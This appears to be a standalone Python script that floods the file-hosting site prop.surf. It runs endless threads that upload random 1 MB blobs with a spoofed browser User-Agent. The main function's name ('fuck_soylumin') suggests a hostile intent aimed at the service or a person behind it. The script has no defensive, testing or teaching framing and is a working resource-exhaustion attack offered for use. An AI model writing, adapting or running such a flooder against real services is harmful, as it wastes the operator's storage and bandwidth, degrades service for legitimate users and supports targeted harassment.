print("Starting...")

import random
import string
import requests
import threading

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36'
}

#file = "dll_bytes.txt"
size = 1
views = 1000
time = 364
num_threads = 2

#file = open(file, 'rb').read()

def upload_file(views_value, time_value):
    fuck = ''.join(random.choices(string.ascii_uppercase + string.digits, k=size*1024*1024))

    form_data = {
        'file': fuck,
        'expiry': views_value + time_value
    }
    
    try:
        response = requests.post('https://prop.surf/', files={'file': fuck}, data={'expiry': form_data['expiry']}, headers=headers)
    except:
        print('Upload failed (caught)')

    try:
        if response.status_code == 200:
            json_response = response.json()
            print("Uploaded At: https://prop.surf/" + json_response["location"])
        else:
            print( "Upload failed" )
    except:
        print( "Upload failed (caught)" )

def fuck_soylumin():
    while (True):
        upload_file(views, time)


threads = []

threading.Thread(target=fuck_soylumin)

for i in range(num_threads):
    thread = threading.Thread(target=fuck_soylumin, args=())
    threads.append(thread)
    thread.start()
